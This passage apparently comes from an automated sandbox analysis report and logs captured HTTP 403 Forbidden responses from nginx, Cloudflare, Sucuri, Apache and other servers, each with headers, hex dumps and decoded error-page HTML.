70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:42 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:42 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:07:35 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:42 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:58 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VF38v8z7IonKrxPpdhTeyMbq0My1Q5b2Fz9Ffr12NONNIoRrCDiLVQEB5S%2FZSaPCaVtPJ9Xysg1oVs5dJ%2FTWBC7%2BRPoEj%2FagUAA8jU5zoPKPGtF8UkBuZa2VVsLQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6de6283c3a67-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d%2FYd1cbSpsREeIFgXz7YvsE%2FoJFx3Qu84KfsebwnPxDCyEfgNI%2BnUG65vp96KI75GkkHnuIlr5Op%2BiK1Y%2BqGU9hoLTTEFxWjX8VWqqiLZGHPqBXA1YbouzeLVDo4NWHL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6de7bdb99b8f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6hDW264DOcOThcXSzLCtl27rz0%2B0Ac9UXtb%2F1fLkRXOh1kcaDm2D1gqH3W0jxjYZxfTbgY7LjrlE14wdmEL%2BZ3HUjX%2B2KgJL3VYqiVVnb%2Bpd02CEzghg43jI2wb6qAcO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6de94f3b9b8f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=czRKnSQDfCy7GTIraT%2Fym%2FLh56cXGnkuyIoKIfoNA6fgCPq2jzEhHdbMtKbpIbVS2Ca1JVFm7aGOPaA%2BOaMtnTyT%2FU8j8mTHJJEZKAHKDkd4yraBBpyeiw5OVDVhmcU9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6deb2f3f1e6c-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:44 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 